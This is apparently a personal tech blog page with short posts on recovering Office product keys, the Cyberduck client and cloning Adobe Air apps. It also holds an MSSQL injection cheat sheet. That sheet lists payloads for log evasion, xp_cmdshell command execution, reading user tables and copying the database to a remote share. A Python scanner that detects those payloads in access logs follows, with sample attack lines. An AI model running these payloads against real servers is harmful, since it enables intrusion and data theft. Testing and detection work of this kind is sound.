Lost product keys

A few years back I stumbled upon a utility called Magical Jelly Bean, whose intended purpose is finding the product key of installed Microsoft applications, primarily the OS itself, as I used this to determine which VLK was used for image deployment in the datacenters.

Looks like the product has not received updates in a while, and I’ve recently been trying to find the key of my Office installation so that I can migrate the install to a new Fusion VM.

For starters, we can determine the last 5 characters of the installed product key with a script included by default with Office.

:: Command Prompt
cd "\Program Files\Microsoft Office\Office14"
cscript ospp.vbs /dstatus
:: Output includes: Last 5 characters of installed product key: XXXXX

Alternatively, we can change the product key completely.
In the registry, expand the Registration key; you will find a separate key for each of the Office suites, with names looking like {XXX}.
In each one of these, look for DigitalProductID and ProductID and delete them. Close the registry editor and restart the Office apps, and you will be prompted for a new key.

In Office 2010 you can also change the key via the command line, which is new. There are 2 ways of changing the key:
Option 1) Add/Remove Programs, locate Office, Change, new product key (yawnnnnn)
Option 2) Instead of the /dstatus argument for OSPP.VBS, use /inpkey:XXXXX-XXXX-XXXX (key value)


Cloud file management! Cyberduck

Having installed OSX Lion, I’ve been on a mission to re-evaluate all of my applications and remove or update those which I am still using. A key tool I was missing, and one essential for every Apple, is a third-party manager for cloud storage repositories. To make matters even better, it supports lesser-known providers, with protocol support for FTP, SFTP, WebDAV, Amazon S3, Windows Azure and Google Storage.

Not just that, but it’s free – everyone’s favorite price! Take a look at Cyberduck: http://cyberduck.ch/. They also have a version out for Windows.

I’m really happy to see Google Docs support, since I’ve been actively using it and trying to find the right place to organize and sort my docs directories.

How to run multiple Adobe Air apps Tweetdeck

Twitter columns can get pretty busy if you’re tweeting from multiple accounts.
I wanted to find the benefits of utilizing 2 display monitors for separate accounts or in some cases the same accounts with unique columns per screen for tweets based on topics, followers or lists.

Chris Deely has written an application named AirAppDuplicator.
Download it here

Get started by clicking download and then on the AirAppDuplicator.AIR package. Proceed past the warnings to install and trust this product (at your own risk). When the application has finished installing, right-click it and run as Administrator if you’re on Windows so that it can clone the Air apps; you will only have to do this once.

Last step: navigate to the directory of the application you want to duplicate (in my case it was Tweetdeck, located in c:\program files (x86)\tweetdeck on my Windows 7 machine) and click to clone. What actually happens is that AirAppDuplicator copies the directory to a similarly named directory, appending 2 to the end of the name.

I haven’t run into any issues yet with multiple instances, and I’m not the author of the application. Use at your own risk! 😉

MSSQL Injection Commands and Output

» Microsoft SQL

Payload | Description (if any)
'admin --sp_password | sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (--) can prevent SQL Injection queries being logged.
select @@version | View database version.
select @@servername | Misc. information disclosure
select @@microsoftversion | Misc. information disclosure
select * from master..sysservers | Misc. information disclosure
select * from sysusers | View database usernames and passwords.
exec master..xp_cmdshell 'ipconfig+/all' | Misc. command execution with xp_cmdshell.
exec master..xp_cmdshell 'net+view' | Misc. command execution with xp_cmdshell.
exec master..xp_cmdshell 'net+users' | Misc. command execution with xp_cmdshell.
exec master..xp_cmdshell 'ping+system-controlled-by-attacker' | Misc. command execution with xp_cmdshell. This is useful for blind SQL Injection tests (where no results are displayed).
BACKUP database master to disks='\\{IP}\{sharename}\backupdb.dat' | Backup entire database to a file. This attack can be used to steal a database.
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp'" select * from myfile"-- | Reading files on the filesystem.
xp_servicecontrol (START or STOP) | Start and stop Windows Services.
str1 + str2 OR n+n | Concat strings for blind SQL Injection tests.
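
The strings in the table above still show up in web server access logs even when the sp_password trick keeps the statement out of the SQL Server trace, so the web tier is where a defender can look for them. The scanner below is an added example, not code from the original post; the rule names, the access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Detection rules keyed to the payload table above (rule names are this example's own).
RULES = [
    ("log-evasion", re.compile(r"--.*\bsp_password\b", re.I)),
    ("os-command", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("service-control", re.compile(r"\bxp_servicecontrol\b", re.I)),
    ("backup-to-share", re.compile(r"\bbackup\s+database\b.*\bto\s+disks?\s*=\s*'\\\\", re.I)),
    ("file-read", re.compile(r"\bbulk\s+insert\b", re.I)),
    ("recon", re.compile(r"@@(?:version|servername|microsoftversion)\b"
                         r"|\bmaster\.\.sysservers\b|\bfrom\s+sysusers\b", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input (%255F -> %5F -> _) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return the names of all rules matched by the query string of one access-log line."""
    m = REQUEST.search(line)
    if not m or "?" not in m.group(1):
        return []
    query = decode(m.group(1).split("?", 1)[1])
    return [name for name, rx in RULES if rx.search(query)]

# Constructed sample log lines (not from the page); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /search.asp?q=backup+software HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /login.asp?user=%27admin+--sp_password HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.asp?id=1;exec+master..xp%255Fcmdshell+%27ipconfig+/all%27 HTTP/1.1" 500 0',
    '198.51.100.9 - - [01/Jan/2024:10:00:14 +0000] "GET /item.asp?id=1;BACKUP+database+master+to+disks=%27%5C%5C192.0.2.10%5Cshare%5Cbackupdb.dat%27-- HTTP/1.1" 500 0',
    '198.51.100.9 - - [01/Jan/2024:10:00:20 +0000] "GET /item.asp?id=1+union+select+@@version,null--+sp_password HTTP/1.1" 200 640',
]

def scan(lines):
    """Map line index -> matched rule names, skipping clean lines."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOG).items():
        print(i, hits)
```

Only the query string is inspected here; POST bodies are not present in a standard access log and would need to be captured separately.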

Four-Tier Query

Web browser sends requests to the middle tier

A simple query

A picture’s worth a thousand words

thank the academy for giving me the strength